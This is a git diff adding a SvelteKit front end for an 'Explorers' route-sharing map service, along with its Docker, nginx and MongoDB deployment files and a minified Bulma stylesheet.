+ "locate-character": "^3.0.0",
+ "magic-string": "^0.30.4",
+ "periscopic": "^3.1.0"
+ },
+ "engines": {
+ "node": ">=16"
+ }
+ },
+ "node_modules/svelte-check": {
+ "version": "3.6.0",
+ "resolved": "https://registry.npmjs.org/svelte-check/-/svelte-check-3.6.0.tgz",
+ "integrity": "sha512-8VfqhfuRJ1sKW+o8isH2kPi0RhjXH1nNsIbCFGyoUHG+ZxVxHYRKcb+S8eaL/1tyj3VGvWYx3Y5+oCUsJgnzcw==",
+ "dev": true,
+ "dependencies": {
+ "@jridgewell/trace-mapping": "^0.3.17",
+ "chokidar": "^3.4.1",
+ "fast-glob": "^3.2.7",
+ "import-fresh": "^3.2.1",
+ "picocolors": "^1.0.0",
+ "sade": "^1.7.4",
+ "svelte-preprocess": "^5.1.0",
+ "typescript": "^5.0.3"
+ },
+ "bin": {
+ "svelte-check": "bin/svelte-check"
+ },
+ "peerDependencies": {
+ "svelte": "^3.55.0 || ^4.0.0-next.0 || ^4.0.0 || ^5.0.0-next.0"
+ }
+ },
+ "node_modules/svelte-hmr": {
+ "version": "0.15.3",
+ "resolved": "https://registry.npmjs.org/svelte-hmr/-/svelte-hmr-0.15.3.tgz",
+ "integrity": "sha512-41snaPswvSf8TJUhlkoJBekRrABDXDMdpNpT2tfHIv4JuhgvHqLMhEPGtaQn0BmbNSTkuz2Ed20DF2eHw0SmBQ==",
+ "engines": {
+ "node": "^12.20 || ^14.13.1 || >= 16"
+ },
+ "peerDependencies": {
+ "svelte": "^3.19.0 || ^4.0.0"
+ }
+ },
+ "node_modules/svelte-ionicons": {
+ "version": "0.7.2",
+ "resolved": "https://registry.npmjs.org/svelte-ionicons/-/svelte-ionicons-0.7.2.tgz",
+ "integrity": "sha512-soICqtqQ6kSBwly3oOyVaoB6ajmgWSMR8tsEKl3sts3lCknFAH7/4F5eT5lnNZW2v2c+SC1y6nk304tHJaWAmA==",
+ "dev": true,
+ "peerDependencies": {
+ "svelte": "^3.54.0 || ^4.0.0"
+ }
+ },
+ "node_modules/svelte-preprocess": {
+ "version": "5.1.1",
+ "resolved": "https://registry.npmjs.org/svelte-preprocess/-/svelte-preprocess-5.1.1.tgz",
+ "integrity": "sha512-p/Dp4hmrBW5mrCCq29lEMFpIJT2FZsRlouxEc5qpbOmXRbaFs7clLs8oKPwD3xCFyZfv1bIhvOzpQkhMEVQdMw==",
+ "dev": true,
+ "hasInstallScript": true,
+ "dependencies": {
+ "@types/pug": "^2.0.6",
+ "detect-indent": "^6.1.0",
+ "magic-string": "^0.27.0",
+ "sorcery": "^0.11.0",
+ "strip-indent": "^3.0.0"
+ },
+ "engines": {
+ "node": ">= 14.10.0"
+ },
+ "peerDependencies": {
+ "@babel/core": "^7.10.2",
+ "coffeescript": "^2.5.1",
+ "less": "^3.11.3 || ^4.0.0",
+ "postcss": "^7 || ^8",
+ "postcss-load-config": "^2.1.0 || ^3.0.0 || ^4.0.0",
+ "pug": "^3.0.0",
+ "sass": "^1.26.8",
+ "stylus": "^0.55.0",
+ "sugarss": "^2.0.0 || ^3.0.0 || ^4.0.0",
+ "svelte": "^3.23.0 || ^4.0.0-next.0 || ^4.0.0 || ^5.0.0-next.0",
+ "typescript": ">=3.9.5 || ^4.0.0 || ^5.0.0"
+ },
+ "peerDependenciesMeta": {
+ "@babel/core": {
+ "optional": true
+ },
+ "coffeescript": {
+ "optional": true
+ },
+ "less": {
+ "optional": true
+ },
+ "postcss": {
+ "optional": true
+ },
+ "postcss-load-config": {
+ "optional": true
+ },
+ "pug": {
+ "optional": true
+ },
+ "sass": {
+ "optional": true
+ },
+ "stylus": {
+ "optional": true
+ },
+ "sugarss": {
+ "optional": true
+ },
+ "typescript": {
+ "optional": true
+ }
+ }
+ },
+ "node_modules/svelte-preprocess/node_modules/magic-string": {
+ "version": "0.27.0",
+ "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.27.0.tgz",
+ "integrity": "sha512-8UnnX2PeRAPZuN12svgR9j7M1uWMovg/CEnIwIG0LFkXSJJe4PdfUGiTGl8V9bsBHFUtfVINcSyYxd7q+kx9fA==",
+ "dev": true,
+ "dependencies": {
+ "@jridgewell/sourcemap-codec": "^1.4.13"
+ },
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/tiny-glob": {
+ "version": "0.2.9",
+ "resolved": "https://registry.npmjs.org/tiny-glob/-/tiny-glob-0.2.9.tgz",
+ "integrity": "sha512-g/55ssRPUjShh+xkfx9UPDXqhckHEsHr4Vd9zX55oSdGZc/MD0m3sferOkwWtp98bv+kcVfEHtRJgBVJzelrzg==",
+ "dependencies": {
+ "globalyzer": "0.1.0",
+ "globrex": "^0.1.2"
+ }
+ },
+ "node_modules/to-regex-range": {
+ "version": "5.0.1",
+ "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz",
+ "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==",
+ "dev": true,
+ "dependencies": {
+ "is-number": "^7.0.0"
+ },
+ "engines": {
+ "node": ">=8.0"
+ }
+ },
+ "node_modules/totalist": {
+ "version": "3.0.1",
+ "resolved": "https://registry.npmjs.org/totalist/-/totalist-3.0.1.tgz",
+ "integrity": "sha512-sf4i37nQ2LBx4m3wB74y+ubopq6W/dIzXg0FDGjsYnZHVa1Da8FH853wlL2gtUhg+xJXjfk3kUZS3BRoQeoQBQ==",
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/typescript": {
+ "version": "5.3.2",
+ "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.3.2.tgz",
+ "integrity": "sha512-6l+RyNy7oAHDfxC4FzSJcz9vnjTKxrLpDG5M2Vu4SHRVNg6xzqZp6LYSR9zjqQTu8DU/f5xwxUdADOkbrIX2gQ==",
+ "dev": true,
+ "bin": {
+ "tsc": "bin/tsc",
+ "tsserver": "bin/tsserver"
+ },
+ "engines": {
+ "node": ">=14.17"
+ }
+ },
+ "node_modules/undici": {
+ "version": "5.26.5",
+ "resolved": "https://registry.npmjs.org/undici/-/undici-5.26.5.tgz",
+ "integrity": "sha512-cSb4bPFd5qgR7qr2jYAi0hlX9n5YKK2ONKkLFkxl+v/9BvC0sOpZjBHDBSXc5lWAf5ty9oZdRXytBIHzgUcerw==",
+ "dependencies": {
+ "@fastify/busboy": "^2.0.0"
+ },
+ "engines": {
+ "node": ">=14.0"
+ }
+ },
+ "node_modules/update-browserslist-db": {
+ "version": "1.0.13",
+ "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.13.tgz",
+ "integrity": "sha512-xebP81SNcPuNpPP3uzeW1NYXxI3rxyJzF3pD6sH4jE7o/IX+WtSpwnVU+qIsDPyk0d3hmFQ7mjqc6AtV604hbg==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "opencollective",
+ "url": "https://opencollective.com/browserslist"
+ },
+ {
+ "type": "tidelift",
+ "url": "https://tidelift.com/funding/github/npm/browserslist"
+ },
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ],
+ "dependencies": {
+ "escalade": "^3.1.1",
+ "picocolors": "^1.0.0"
+ },
+ "bin": {
+ "update-browserslist-db": "cli.js"
+ },
+ "peerDependencies": {
+ "browserslist": ">= 4.21.0"
+ }
+ },
+ "node_modules/vite": {
+ "version": "4.5.0",
+ "resolved": "https://registry.npmjs.org/vite/-/vite-4.5.0.tgz",
+ "integrity": "sha512-ulr8rNLA6rkyFAlVWw2q5YJ91v098AFQ2R0PRFwPzREXOUJQPtFUG0t+/ZikhaOCDqFoDhN6/v8Sq0o4araFAw==",
+ "dependencies": {
+ "esbuild": "^0.18.10",
+ "postcss": "^8.4.27",
+ "rollup": "^3.27.1"
+ },
+ "bin": {
+ "vite": "bin/vite.js"
+ },
+ "engines": {
+ "node": "^14.18.0 || >=16.0.0"
+ },
+ "funding": {
+ "url": "https://github.com/vitejs/vite?sponsor=1"
+ },
+ "optionalDependencies": {
+ "fsevents": "~2.3.2"
+ },
+ "peerDependencies": {
+ "@types/node": ">= 14",
+ "less": "*",
+ "lightningcss": "^1.21.0",
+ "sass": "*",
+ "stylus": "*",
+ "sugarss": "*",
+ "terser": "^5.4.0"
+ },
+ "peerDependenciesMeta": {
+ "@types/node": {
+ "optional": true
+ },
+ "less": {
+ "optional": true
+ },
+ "lightningcss": {
+ "optional": true
+ },
+ "sass": {
+ "optional": true
+ },
+ "stylus": {
+ "optional": true
+ },
+ "sugarss": {
+ "optional": true
+ },
+ "terser": {
+ "optional": true
+ }
+ }
+ },
+ "node_modules/vitefu": {
+ "version": "0.2.5",
+ "resolved": "https://registry.npmjs.org/vitefu/-/vitefu-0.2.5.tgz",
+ "integrity": "sha512-SgHtMLoqaeeGnd2evZ849ZbACbnwQCIwRH57t18FxcXoZop0uQu0uzlIhJBlF/eWVzuce0sHeqPcDo+evVcg8Q==",
+ "peerDependencies": {
+ "vite": "^3.0.0 || ^4.0.0 || ^5.0.0"
+ },
+ "peerDependenciesMeta": {
+ "vite": {
+ "optional": true
+ }
+ }
+ },
+ "node_modules/wrappy": {
+ "version": "1.0.2",
+ "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz",
+ "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==",
+ "dev": true
+ },
+ "node_modules/yaml": {
+ "version": "2.3.4",
+ "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.3.4.tgz",
+ "integrity": "sha512-8aAvwVUSHpfEqTQ4w/KMlf3HcRdt50E5ODIQJBw1fQ5RL34xabzxtUlzTXVqc4rkZsPbvrXKWnABCD7kWSmocA==",
+ "dev": true,
+ "optional": true,
+ "peer": true,
+ "engines": {
+ "node": ">= 14"
+ }
+ }
+ }
+}
diff --git a/internal/explorers-front/package.json b/internal/explorers-front/package.json
new file mode 100644
index 0000000..4ef9c6e
--- /dev/null
+++ b/internal/explorers-front/package.json
@@ -0,0 +1,30 @@
+{
+ "name": "explorers-front",
+ "version": "0.0.1",
+ "scripts": {
+ "dev": "vite dev",
+ "build": "vite build",
+ "preview": "vite preview",
+ "check": "svelte-kit sync && svelte-check --tsconfig ./jsconfig.json",
+ "check:watch": "svelte-kit sync && svelte-check --tsconfig ./jsconfig.json --watch"
+ },
+ "devDependencies": {
+ "@fontsource/fira-mono": "^4.5.10",
+ "@neoconfetti/svelte": "^1.0.0",
+ "@sveltejs/adapter-auto": "^2.0.0",
+ "@sveltejs/kit": "^1.27.4",
+ "@types/cookie": "^0.5.1",
+ "autoprefixer": "^10.4.16",
+ "svelte": "^4.0.5",
+ "svelte-check": "^3.6.0",
+ "svelte-ionicons": "^0.7.2",
+ "typescript": "^5.0.0",
+ "vite": "^4.4.2"
+ },
+ "type": "module",
+ "dependencies": {
+ "@sveltejs/adapter-static": "^2.0.3",
+ "bulma": "^0.9.4",
+ "leaflet": "^1.9.4"
+ }
+}
diff --git a/internal/explorers-front/src/app.d.ts b/internal/explorers-front/src/app.d.ts
new file mode 100644
index 0000000..f59b884
--- /dev/null
+++ b/internal/explorers-front/src/app.d.ts
@@ -0,0 +1,12 @@
+// See https://kit.svelte.dev/docs/types#app
+// for information about these interfaces
+declare global {
+ namespace App {
+ // interface Error {}
+ // interface Locals {}
+ // interface PageData {}
+ // interface Platform {}
+ }
+}
+
+export {};
diff --git a/internal/explorers-front/src/app.html b/internal/explorers-front/src/app.html
new file mode 100644
index 0000000..77a5ff5
--- /dev/null
+++ b/internal/explorers-front/src/app.html
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+ %sveltekit.head%
+
+
+ %sveltekit.body%
+
+
diff --git a/internal/explorers-front/src/routes/+layout.js b/internal/explorers-front/src/routes/+layout.js
new file mode 100644
index 0000000..b71827c
--- /dev/null
+++ b/internal/explorers-front/src/routes/+layout.js
@@ -0,0 +1,20 @@
+/** @type {import('./$types').PageLoad} */
+import { PUBLIC_BASE_URL } from '$env/static/public';
+export const ssr = false;
+
+export async function load({ fetch }) {
+ const res = await fetch(`${PUBLIC_BASE_URL}/user`, {
+ credentials: 'include'
+ });
+ let user = null;
+ try {
+ if (res.ok) {
+ user = await res.json();
+ }
+ }
+ catch (err) {
+ user = null;
+ }
+
+ return { user: user };
+}
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/+layout.svelte b/internal/explorers-front/src/routes/+layout.svelte
new file mode 100644
index 0000000..552c59a
--- /dev/null
+++ b/internal/explorers-front/src/routes/+layout.svelte
@@ -0,0 +1,43 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/internal/explorers-front/src/routes/+page.js b/internal/explorers-front/src/routes/+page.js
new file mode 100644
index 0000000..a27376a
--- /dev/null
+++ b/internal/explorers-front/src/routes/+page.js
@@ -0,0 +1,7 @@
+import {PUBLIC_BASE_URL} from '$env/static/public';
+
+export async function load({fetch, parent }) {
+ const {user} = await parent();
+
+ return {};
+}
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/+page.svelte b/internal/explorers-front/src/routes/+page.svelte
new file mode 100644
index 0000000..6657b9e
--- /dev/null
+++ b/internal/explorers-front/src/routes/+page.svelte
@@ -0,0 +1,94 @@
+
+{#if error}
+ {error}
+{/if}
+
+
+
+
+ {#if user}
+
Welcome back, {user.username}!
+ {:else}
+ Welcome to the "Explorers" service!
+ {/if}
+
+
+
+{#if user}
+
+{:else}
+
+
+
+
+
Record your expedition route using smart trackers.
+
Record
+
+
+
+
+
+
Upload your route to the service!
+
Upload
+
+
+
+
+
+
Or create the route manually
+
Create
+
+
+
+
+
+
Share your route with colleagues and management.
+
Share
+
+
+
+
+
+
+{/if}
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/RouteList.svelte b/internal/explorers-front/src/routes/RouteList.svelte
new file mode 100644
index 0000000..534e0c8
--- /dev/null
+++ b/internal/explorers-front/src/routes/RouteList.svelte
@@ -0,0 +1,22 @@
+
+
+
+
Routes created by you:
+
+ {#each routes as route}
+
{route.title}
+ {/each}
+
+
+
diff --git a/internal/explorers-front/src/routes/components/Map.svelte b/internal/explorers-front/src/routes/components/Map.svelte
new file mode 100644
index 0000000..d5be6e3
--- /dev/null
+++ b/internal/explorers-front/src/routes/components/Map.svelte
@@ -0,0 +1,134 @@
+
+
+
+
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/components/MarkerPopup.svelte b/internal/explorers-front/src/routes/components/MarkerPopup.svelte
new file mode 100644
index 0000000..4bd164d
--- /dev/null
+++ b/internal/explorers-front/src/routes/components/MarkerPopup.svelte
@@ -0,0 +1,55 @@
+
+
+
+
+ {#if editable}
+
Delete
+
+ Title:
+
+ Description:
+
+ Comment:
+
+
+ {:else }
+
+
{title}
+
{desc}
+
{comment}
+
+ {/if}
+
+
+
diff --git a/internal/explorers-front/src/routes/create/+page.svelte b/internal/explorers-front/src/routes/create/+page.svelte
new file mode 100644
index 0000000..e89a8a1
--- /dev/null
+++ b/internal/explorers-front/src/routes/create/+page.svelte
@@ -0,0 +1,80 @@
+
+
+ {#if error}
+
+ {/if}
+
+
+
+
+
+
Create a new route
+
+
+
+
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/logout/+page.svelte b/internal/explorers-front/src/routes/logout/+page.svelte
new file mode 100644
index 0000000..cba8eb5
--- /dev/null
+++ b/internal/explorers-front/src/routes/logout/+page.svelte
@@ -0,0 +1,26 @@
+
+
+
+
+
+ Are you sure you want to log out?
+
+
+
+
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/route/[slug]/+page.js b/internal/explorers-front/src/routes/route/[slug]/+page.js
new file mode 100644
index 0000000..a4cf94c
--- /dev/null
+++ b/internal/explorers-front/src/routes/route/[slug]/+page.js
@@ -0,0 +1,28 @@
+import {PUBLIC_BASE_URL} from '$env/static/public';
+
+export async function load({fetch, parent, params, url}) {
+ const {user} = await parent();
+
+ let slug = params.slug;
+ let shareToken = url.searchParams.get('token');
+ let routeURL = `${PUBLIC_BASE_URL}/route/${slug}` + (shareToken ? `?token=${shareToken}` : '');
+
+ let res = await fetch(routeURL, {
+ credentials: 'include'
+ });
+
+ if (res.ok) {
+ let route = await res.json();
+ return {route: route, error: null};
+ }
+
+ let error = await res.text();
+ try {
+ error = await res.json().detail.error;
+ } catch (e) {
+ // ignore.
+ }
+
+
+ return {route: {}, error: error};
+}
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/route/[slug]/+page.svelte b/internal/explorers-front/src/routes/route/[slug]/+page.svelte
new file mode 100644
index 0000000..32f7d25
--- /dev/null
+++ b/internal/explorers-front/src/routes/route/[slug]/+page.svelte
@@ -0,0 +1,132 @@
+
+
+{#if error}
+
+ {error}
+
+{/if}
+
+
+
+
+
+ {#if canEdit}
+
+ {/if}
+
+
+
+
+
+
+ {#if canEdit}
+
+
+
+
+
+
+
+ Upload a GPX file
+
+
+
+ {#if files && files.length > 0}
+ {files[0].name}
+ {/if}
+
+
+
+
+
+
+
+ Upload
+
+
+
+
+ Save
+
+
+ {/if}
+
diff --git a/internal/explorers-front/src/routes/signin/+page.svelte b/internal/explorers-front/src/routes/signin/+page.svelte
new file mode 100644
index 0000000..88a8d52
--- /dev/null
+++ b/internal/explorers-front/src/routes/signin/+page.svelte
@@ -0,0 +1,84 @@
+
+
+ {#if error}
+
+ {/if}
+
+
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/signup/+page.svelte b/internal/explorers-front/src/routes/signup/+page.svelte
new file mode 100644
index 0000000..a0dc22f
--- /dev/null
+++ b/internal/explorers-front/src/routes/signup/+page.svelte
@@ -0,0 +1,84 @@
+
+
+ {#if error}
+
+ {/if}
+
+
\ No newline at end of file
diff --git a/internal/explorers-front/src/routes/styles.css b/internal/explorers-front/src/routes/styles.css
new file mode 100644
index 0000000..1441d94
--- /dev/null
+++ b/internal/explorers-front/src/routes/styles.css
@@ -0,0 +1,107 @@
+@import '@fontsource/fira-mono';
+
+:root {
+ --font-body: Arial, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu,
+ Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
+ --font-mono: 'Fira Mono', monospace;
+ --color-bg-0: rgb(202, 216, 228);
+ --color-bg-1: hsl(209, 36%, 86%);
+ --color-bg-2: hsl(224, 44%, 95%);
+ --color-theme-1: #ff3e00;
+ --color-theme-2: #4075a6;
+ --color-text: rgba(0, 0, 0, 0.7);
+ --column-width: 42rem;
+ --column-margin-top: 4rem;
+ font-family: var(--font-body);
+ color: var(--color-text);
+}
+
+body {
+ min-height: 100vh;
+ margin: 0;
+ background-attachment: fixed;
+ background-color: var(--color-bg-1);
+ background-size: 100vw 100vh;
+ background-image: radial-gradient(
+ 50% 50% at 50% 50%,
+ rgba(255, 255, 255, 0.75) 0%,
+ rgba(255, 255, 255, 0) 100%
+ ),
+ linear-gradient(180deg, var(--color-bg-0) 0%, var(--color-bg-1) 15%, var(--color-bg-2) 50%);
+}
+
+h1,
+h2,
+p {
+ font-weight: 400;
+}
+
+p {
+ line-height: 1.5;
+}
+
+a {
+ color: var(--color-theme-1);
+ text-decoration: none;
+}
+
+a:hover {
+ text-decoration: underline;
+}
+
+h1 {
+ font-size: 2rem;
+ text-align: center;
+}
+
+h2 {
+ font-size: 1rem;
+}
+
+pre {
+ font-size: 16px;
+ font-family: var(--font-mono);
+ background-color: rgba(255, 255, 255, 0.45);
+ border-radius: 3px;
+ box-shadow: 2px 2px 6px rgb(255 255 255 / 25%);
+ padding: 0.5em;
+ overflow-x: auto;
+ color: var(--color-text);
+}
+
+.text-column {
+ display: flex;
+ max-width: 48rem;
+ flex: 0.6;
+ flex-direction: column;
+ justify-content: center;
+ margin: 0 auto;
+}
+
+input,
+button {
+ font-size: inherit;
+ font-family: inherit;
+}
+
+button:focus:not(:focus-visible) {
+ outline: none;
+}
+
+@media (min-width: 720px) {
+ h1 {
+ font-size: 2.4rem;
+ }
+}
+
+.visually-hidden {
+ border: 0;
+ clip: rect(0 0 0 0);
+ height: auto;
+ margin: 0;
+ overflow: hidden;
+ padding: 0;
+ position: absolute;
+ width: 1px;
+ white-space: nowrap;
+}
diff --git a/internal/explorers-front/static/favicon.png b/internal/explorers-front/static/favicon.png
new file mode 100644
index 0000000..0c63270
Binary files /dev/null and b/internal/explorers-front/static/favicon.png differ
diff --git a/internal/explorers-front/static/robots.txt b/internal/explorers-front/static/robots.txt
new file mode 100644
index 0000000..e9e57dc
--- /dev/null
+++ b/internal/explorers-front/static/robots.txt
@@ -0,0 +1,3 @@
+# https://www.robotstxt.org/robotstxt.html
+User-agent: *
+Disallow:
diff --git a/internal/explorers-front/svelte.config.js b/internal/explorers-front/svelte.config.js
new file mode 100644
index 0000000..c79d8d2
--- /dev/null
+++ b/internal/explorers-front/svelte.config.js
@@ -0,0 +1,17 @@
+import adapter from '@sveltejs/adapter-static';
+
+/** @type {import('@sveltejs/kit').Config} */
+const config = {
+ kit: {
+ // adapter-auto only supports some environments, see https://kit.svelte.dev/docs/adapter-auto for a list.
+ // If your environment is not supported or you settled on a specific environment, switch out the adapter.
+ // See https://kit.svelte.dev/docs/adapters for more information about adapters.
+ adapter: adapter({
+ fallback: 'index.html' // may differ from host to host
+ })
+ }
+};
+
+export default config;
+
+
diff --git a/internal/explorers-front/vite.config.js b/internal/explorers-front/vite.config.js
new file mode 100644
index 0000000..bbf8c7d
--- /dev/null
+++ b/internal/explorers-front/vite.config.js
@@ -0,0 +1,6 @@
+import { sveltekit } from '@sveltejs/kit/vite';
+import { defineConfig } from 'vite';
+
+export default defineConfig({
+ plugins: [sveltekit()]
+});
diff --git a/services/explorers/Dockerfile b/services/explorers/Dockerfile
new file mode 100644
index 0000000..f34e662
--- /dev/null
+++ b/services/explorers/Dockerfile
@@ -0,0 +1,15 @@
+FROM python:3.11-slim-bullseye
+
+RUN apt update && apt install -y xxd
+WORKDIR /app
+ADD src/requirements.txt requirements.txt
+
+RUN pip3 install -r requirements.txt
+
+COPY app.env app.env
+
+RUN sed -i "s/JWT_KEY=.*/JWT_KEY=$(xxd -u -l 20 -p /dev/urandom)/g" app.env
+
+COPY src .
+
+CMD python3 main.py
\ No newline at end of file
diff --git a/services/explorers/app.env b/services/explorers/app.env
new file mode 100644
index 0000000..c263825
--- /dev/null
+++ b/services/explorers/app.env
@@ -0,0 +1,3 @@
+JWT_KEY=secret
+MONGO_URI=mongodb://mongodb:27017/explorers
+```
\ No newline at end of file
diff --git a/services/explorers/conf/app.conf b/services/explorers/conf/app.conf
new file mode 100644
index 0000000..03b3607
--- /dev/null
+++ b/services/explorers/conf/app.conf
@@ -0,0 +1,24 @@
+server {
+ listen 8000;
+
+ server_name default;
+
+ location /api {
+ client_max_body_size 50M;
+ proxy_set_header Host $host;
+ proxy_set_header X-Real-IP $remote_addr;
+ proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+ proxy_pass http://app:8000;
+ }
+
+ location / {
+ gzip on;
+ gzip_static on;
+ gzip_types text/plain text/css text/javascript application/javascript;
+ gzip_disable "msie6";
+ root /front/build;
+ try_files $uri $uri/ /index.html;
+ autoindex off;
+ }
+
+}
\ No newline at end of file
diff --git a/services/explorers/docker-compose.yml b/services/explorers/docker-compose.yml
new file mode 100644
index 0000000..a0a0519
--- /dev/null
+++ b/services/explorers/docker-compose.yml
@@ -0,0 +1,34 @@
+services:
+ proxy:
+ image: nginx:1.25-alpine
+ ports:
+ - "8000:8000"
+ restart: unless-stopped
+ volumes:
+ - ./conf/app.conf:/etc/nginx/conf.d/default.conf
+ - ./front/build:/front/build
+ depends_on:
+ - app
+
+ app:
+ build: .
+ restart: unless-stopped
+
+ cpus: 2
+ pids_limit: 256
+ mem_limit: 1024m
+ environment:
+ - NUM_WORKERS=4
+
+ depends_on:
+ - mongodb
+
+
+ mongodb:
+ image: mongo:7.0.2
+ volumes:
+ - dbdata:/data/db
+ restart: unless-stopped
+
+volumes:
+ dbdata:
\ No newline at end of file
diff --git a/services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css b/services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css
new file mode 100644
index 0000000..9c4b389
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css
@@ -0,0 +1 @@
+/*! bulma.io v0.9.4 | MIT License | github.com/jgthms/bulma */.button,.input,.textarea,.select select,.file-cta,.file-name,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:focus,.input:focus,.textarea:focus,.select select:focus,.file-cta:focus,.file-name:focus,.pagination-previous:focus,.pagination-next:focus,.pagination-link:focus,.pagination-ellipsis:focus,.is-focused.button,.is-focused.input,.is-focused.textarea,.select select.is-focused,.is-focused.file-cta,.is-focused.file-name,.is-focused.pagination-previous,.is-focused.pagination-next,.is-focused.pagination-link,.is-focused.pagination-ellipsis,.button:active,.input:active,.textarea:active,.select select:active,.file-cta:active,.file-name:active,.pagination-previous:active,.pagination-next:active,.pagination-link:active,.pagination-ellipsis:active,.is-active.button,.is-active.input,.is-active.textarea,.select select.is-active,.is-active.file-cta,.is-active.file-name,.is-active.pagination-previous,.is-active.pagination-next,.is-active.pagination-link,.is-active.pagination-ellipsis{outline:none}.button[disabled],.input[disabled],.textarea[disabled],.select select[disabled],.file-cta[disabled],.file-name[disabled],.pagination-previous[disabled],.pagination-next[disabled],.pagination-link[disabled],.pagination-ellipsis[disabled],fieldset[disabled] .button,fieldset[disabled] .input,fieldset[disabled] .textarea,fieldset[disabled] .select select,.select fieldset[disabled] select,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .pagination-previous,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-ellipsis{cursor:not-allowed}.button,.file,.breadcrumb,.pagination-previous,.pagination-next,.pagination-link,.pagination-ellipsis,.tabs,.is-unselectable{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.select:not(.is-multiple):not(.is-loading):after,.navbar-link:not(.is-arrowless):after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.box:not(:last-child),.content:not(:last-child),.notification:not(:last-child),.progress:not(:last-child),.table:not(:last-child),.table-container:not(:last-child),.title:not(:last-child),.subtitle:not(:last-child),.block:not(:last-child),.breadcrumb:not(:last-child),.level:not(:last-child),.message:not(:last-child),.pagination:not(:last-child),.tabs:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-moz-appearance:none;-webkit-appearance:none;background-color:#0a0a0a33;border:none;border-radius:9999px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:none;position:relative;vertical-align:top;width:20px}.delete:before,.modal-close:before,.delete:after,.modal-close:after{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translate(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.delete:before,.modal-close:before{height:2px;width:50%}.delete:after,.modal-close:after{height:50%;width:2px}.delete:hover,.modal-close:hover,.delete:focus,.modal-close:focus{background-color:#0a0a0a4d}.delete:active,.modal-close:active{background-color:#0a0a0a66}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading:after,.loader,.select.is-loading:after,.control.is-loading:after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:9999px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.image.is-square img,.image.is-square .has-ratio,.image.is-1by1 img,.image.is-1by1 .has-ratio,.image.is-5by4 img,.image.is-5by4 .has-ratio,.image.is-4by3 img,.image.is-4by3 .has-ratio,.image.is-3by2 img,.image.is-3by2 .has-ratio,.image.is-5by3 img,.image.is-5by3 .has-ratio,.image.is-16by9 img,.image.is-16by9 .has-ratio,.image.is-2by1 img,.image.is-2by1 .has-ratio,.image.is-3by1 img,.image.is-3by1 .has-ratio,.image.is-4by5 img,.image.is-4by5 .has-ratio,.image.is-3by4 img,.image.is-3by4 .has-ratio,.image.is-2by3 img,.image.is-2by3 .has-ratio,.image.is-3by5 img,.image.is-3by5 .has-ratio,.image.is-9by16 img,.image.is-9by16 .has-ratio,.image.is-1by2 img,.image.is-1by2 .has-ratio,.image.is-1by3 img,.image.is-1by3 .has-ratio,.modal,.modal-background,.is-overlay,.hero-video{bottom:0;left:0;position:absolute;right:0;top:0}.navbar-burger{-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;color:currentColor;font-family:inherit;font-size:1em;margin:0;padding:0}/*! minireset.css v0.0.6 | MIT License | 